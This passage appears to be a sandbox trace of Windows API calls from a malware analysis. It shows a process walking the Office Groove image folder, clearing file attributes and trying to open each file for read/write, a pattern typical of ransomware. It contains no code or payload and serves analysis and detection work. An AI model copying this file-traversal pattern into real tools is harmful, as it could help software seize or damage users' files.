dwFileAttributes=0x80) returned 0 [0137.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ADD.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\add.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.040] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.040] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.041] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.041] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.041] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\AddToViewArrow.jpg", dwFileAttributes=0x80) returned 0 [0137.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\AddToViewArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\addtoviewarrow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.041] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.041] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.041] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.041] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.041] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\AddToViewArrowMask.bmp", dwFileAttributes=0x80) returned 0 [0137.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\AddToViewArrowMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\addtoviewarrowmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.042] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.042] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.042] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.042] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.042] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\attention.gif", dwFileAttributes=0x80) returned 0 [0137.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\attention.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\attention.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.042] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.042] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.042] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.042] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.043] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\BG_ADOBE.GIF", dwFileAttributes=0x80) returned 0 [0137.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\BG_ADOBE.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_adobe.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.043] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.043] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.043] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.043] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.043] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Casual.gif", dwFileAttributes=0x80) returned 0 [0137.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Casual.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_casual.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.043] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.043] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.043] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.043] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.044] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Country.gif", dwFileAttributes=0x80) returned 0 [0137.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Country.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_country.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.044] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.044] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.044] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.044] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.044] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Earthy.gif", dwFileAttributes=0x80) returned 0 [0137.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Earthy.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_earthy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.044] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.044] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.045] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.045] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.045] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_FormsHomePage.gif", dwFileAttributes=0x80) returned 0 [0137.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_FormsHomePage.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_formshomepage.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.045] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.045] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.045] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.045] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.045] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_FormsHomePageBlank.gif", dwFileAttributes=0x80) returned 0 [0137.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_FormsHomePageBlank.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_formshomepageblank.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.046] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.046] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.046] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.046] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_FormsHomePageSlice.gif", dwFileAttributes=0x80) returned 0 [0137.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_FormsHomePageSlice.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_formshomepageslice.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.046] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.046] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.046] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.046] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.047] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_GreenTea.gif", dwFileAttributes=0x80) returned 0 [0137.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_GreenTea.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_greentea.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.047] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.047] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.047] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.047] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.047] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Groove.gif", dwFileAttributes=0x80) returned 0 [0137.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Groove.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_groove.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.047] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.047] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.047] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.047] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.048] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_LightSpirit.gif", dwFileAttributes=0x80) returned 0 [0137.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_LightSpirit.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_lightspirit.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.048] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.048] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.048] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.048] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.048] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_OliveGreen.gif", dwFileAttributes=0x80) returned 0 [0137.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_OliveGreen.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_olivegreen.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.048] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.048] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.049] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.049] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.049] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Premium.gif", dwFileAttributes=0x80) returned 0 [0137.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Premium.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_premium.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.049] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.049] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.049] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.049] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.049] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_SlateBlue.gif", dwFileAttributes=0x80) returned 0 [0137.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_SlateBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_slateblue.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.049] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.050] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.050] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.050] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.050] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_TexturedBlue.gif", dwFileAttributes=0x80) returned 0 [0137.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_TexturedBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_texturedblue.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.050] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.050] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.050] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.050] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.050] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_VelvetRose.gif", dwFileAttributes=0x80) returned 0 [0137.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_VelvetRose.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_velvetrose.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.051] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.051] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.051] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.051] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.051] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_left.gif", dwFileAttributes=0x80) returned 0 [0137.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_left.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\button_left.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.052] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.052] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.052] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.052] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.052] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_left_over.gif", dwFileAttributes=0x80) returned 0 [0137.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_left_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\button_left_over.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.052] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.052] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.052] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.052] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.053] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_mid.gif", dwFileAttributes=0x80) returned 0 [0137.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_mid.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\button_mid.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.053] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.053] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.053] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.053] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.053] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_mid_over.gif", dwFileAttributes=0x80) returned 0 [0137.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_mid_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\button_mid_over.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.054] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.054] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.054] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.054] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.054] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_right.gif", dwFileAttributes=0x80) returned 0 [0137.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_right.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\button_right.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.054] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.054] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.055] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.055] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.055] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_right_over.gif", dwFileAttributes=0x80) returned 0 [0137.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_right_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\button_right_over.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.055] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.055] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.055] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.055] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.055] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\CALENDAR.GIF", dwFileAttributes=0x80) returned 0 [0137.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\CALENDAR.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\calendar.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.056] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.056] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.056] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.056] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.056] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\DELETE.GIF", dwFileAttributes=0x80) returned 0 [0137.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\DELETE.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\delete.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.056] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.056] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.056] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.056] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.056] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ERROR.GIF", 